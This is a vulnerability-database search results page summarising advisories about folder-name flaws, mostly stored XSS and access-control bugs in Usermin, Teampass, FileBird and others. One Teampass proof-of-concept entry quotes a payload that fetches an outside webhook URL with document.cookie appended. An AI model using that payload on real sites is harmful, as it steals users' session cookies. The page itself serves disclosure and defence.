Lucene search
K

111 matches found

RedhatCVE
RedhatCVE
added 2025/05/22 10:2 a.m.5 views

CVE-2019-17189

totemodata 3.0.0b936 has XSS via a folder name...

5.4CVSS5.9AI score0.00773EPSS
Exploits1References1
OSV
OSV
added 2025/03/04 1:15 a.m.4 views

CVE-2025-1892

A vulnerability was found in shishuocms 1.1. It has been classified as problematic. Affected is an unknown function of the file /manage/folder/add.json of the component Directory Deletion Page. The manipulation of the argument folderName leads to cross site scripting. It is possible to launch the...

4.8CVSS3.6AI score0.00378EPSS
Exploits1References4
Patchstack
Patchstack
added 2024/05/15 5:34 a.m.5 views

WordPress SP Project & Document Manager plugin <= 4.70 - Authenticated (Subscriber+) Arbitrary Folder Name Update vulnerability

Authenticated Subscriber+ Arbitrary Folder Name Update vulnerability discovered by fewwords huang in WordPress Plugin SP Project & Document Manager versions = 4.70...

4.3CVSS7AI score0.0042EPSS
Exploits0References1Affected Software1
Cvelist
Cvelist
added 2024/05/09 8:3 p.m.22 views

CVE-2024-1693 SP Project & Document Manager <= 4.70 - Authenticated (Subscriber+) Arbitrary Folder Name Update

The SP Project & Document Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cdmsavecategory AJAX action in all versions up to, and including, 4.70. This makes it possible for authenticated attackers, with subscriber-level acce...

4.3CVSS5.7AI score0.0042EPSS
Exploits0References2
WPVulnDB
WPVulnDB
added 2024/05/07 12:0 a.m.8 views

SP Project & Document Manager <= 4.70 - Authenticated (Subscriber+) Arbitrary Folder Name Update

Description The SP Project & Document Manager plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the cdmsavecategory AJAX action in all versions up to, and including, 4.70. This makes it possible for authenticated attackers, with...

4.3CVSS6.8AI score0.0042EPSS
Exploits0References1
OSV
OSV
added 2024/05/02 5:15 p.m.4 views

CVE-2024-2345

The FileBird – WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the folder name parameter in all versions up to, and including, 5.6.3 due to insufficient input sanitization and output escaping. This makes it possible for...

5.4CVSS5.9AI score0.00343EPSS
Exploits0References2
Positive Technologies
Positive Technologies
added 2024/05/02 12:0 a.m.4 views

PT-2024-19876 · WordPress · Filebird

Name of the Vulnerable Software and Affected Versions: The FileBird – WordPress Media Library Folders & File Manager plugin versions up to and including 5.6.3 Description: The issue is related to Stored Cross-Site Scripting due to insufficient input sanitization and output escaping, specifically...

6.4CVSS5.6AI score0.00343EPSS
Exploits0References6
ATTACKERKB
ATTACKERKB
added 2023/09/16 6:15 a.m.5 views

CVE-2023-41157

Multiple stored cross-site scripting XSS vulnerabilities in Usermin 2.000 allow remote attackers to inject arbitrary web script or HTML via the folder name parameter while creating the folder to manage the folder tab, filter tab, and forward mail tab...

5.4CVSS5.8AI score0.00397EPSS
Exploits0References3
NVD
NVD
added 2023/09/16 6:15 a.m.34 views

CVE-2023-41157

Multiple stored cross-site scripting XSS vulnerabilities in Usermin 2.000 allow remote attackers to inject arbitrary web script or HTML via the folder name parameter while creating the folder to manage the folder tab, filter tab, and forward mail tab...

5.4CVSS5.4AI score0.00397EPSS
Exploits0References2
Cvelist
Cvelist
added 2023/09/16 12:0 a.m.35 views

CVE-2023-41157

Multiple stored cross-site scripting XSS vulnerabilities in Usermin 2.000 allow remote attackers to inject arbitrary web script or HTML via the folder name parameter while creating the folder to manage the folder tab, filter tab, and forward mail tab...

5.6AI score0.00397EPSS
Exploits0References2
CVE
CVE
added 2023/09/16 12:0 a.m.102 views

CVE-2023-41157

CVE-2023-41157 affects Usermin 2.000. The vulnerability is a stored XSS in the folder name parameter when creating folders, affecting the Folder/Filters/Forward Mail tabs. An attacker can inject arbitrary script/HTML by supplying crafted folder names. Root cause is improper handling/validation of...

5.4CVSS5.3AI score0.00397EPSS
Exploits0References2Affected Software1
OSV
OSV
added 2023/09/16 12:0 a.m.31 views

CVE-2023-41157

Multiple stored cross-site scripting XSS vulnerabilities in Usermin 2.000 allow remote attackers to inject arbitrary web script or HTML via the folder name parameter while creating the folder to manage the folder tab, filter tab, and forward mail tab...

5.4CVSS5.8AI score0.00397EPSS
Exploits0References4
Positive Technologies
Positive Technologies
added 2023/09/15 12:0 a.m.8 views

PT-2023-27832 · Usermin · Usermin

Name of the Vulnerable Software and Affected Versions: Usermin version 2.000 Description: The issue allows remote attackers to inject arbitrary web script or HTML via the folder name parameter while creating a folder. This affects the management of the folder tab, filter tab, and forward mail tab...

5.4CVSS5.7AI score0.00397EPSS
Exploits0References5
Huntr
Huntr
added 2023/06/12 5:46 p.m.15 views

XSS Filter Bypass in Folder Name leading to Information Disclosure

Description Proof of Concept First, login to Teampass and go to the Folders tab. Create a new folder using Hex entities in the Label. In this case: scriptfetchhttpswebhooksitejlk documentcookiescript which is fetch'https://webhook.site/jlk/' + document.cookie Next, select the created folder and...

4.9CVSS6.6AI score0.00541EPSS
Exploits1References1
Huntr
Huntr
added 2023/06/06 6:51 a.m.22 views

HTML Injection in Folder Name

Description The folder name does not sanitize folder name and due to missing output encoding, HTML user-input is rendered in the webpage during folder deletion. Proof of Concept 1. Login to Teampass as any user. 2. Go to Folders tab. 3. Create a new folder with HTML tag in the Label. Example: HTM...

4.9CVSS6.9AI score0.00522EPSS
Exploits1References1
OSV
OSV
added 2023/05/02 2:15 p.m.5 views

CVE-2023-2445

Improper access control in Subscriptions Folder path filter in Devolutions Server 2023.1.1 and earlier allows attackers with administrator privileges to retrieve usage information on folders in user vaults via a specific folder name...

4.9CVSS5.8AI score0.00979EPSS
Exploits0References1
NVD
NVD
added 2023/05/02 2:15 p.m.32 views

CVE-2023-2445

Improper access control in Subscriptions Folder path filter in Devolutions Server 2023.1.1 and earlier allows attackers with administrator privileges to retrieve usage information on folders in user vaults via a specific folder name...

4.9CVSS5AI score0.00979EPSS
Exploits0References1
Prion
Prion
added 2023/05/02 2:15 p.m.27 views

Improper access control

Improper access control in Subscriptions Folder path filter in Devolutions Server 2023.1.1 and earlier allows attackers with administrator privileges to retrieve usage information on folders in user vaults via a specific folder name...

3.3CVSS5AI score0.00979EPSS
Exploits0References1Affected Software1
Vulnrichment
Vulnrichment
added 2023/05/02 1:11 p.m.12 views

CVE-2023-2445

Improper access control in Subscriptions Folder path filter in Devolutions Server 2023.1.1 and earlier allows attackers with administrator privileges to retrieve usage information on folders in user vaults via a specific folder name...

5AI score0.00979EPSS
Exploits0References1
CNNVD
CNNVD
added 2023/05/02 12:0 a.m.4 views

Devolutions Server 安全漏洞

Devolutions Server is an application from Devolutions Canada. provides a full-featured shared account and password management solution. A security vulnerability exists in Devolutions Server version 2023.1.1 and prior versions that stems from improper access control. An attacker could exploit the...

4.9CVSS5.5AI score0.00979EPSS
Exploits0References2
Rows per page
Query Builder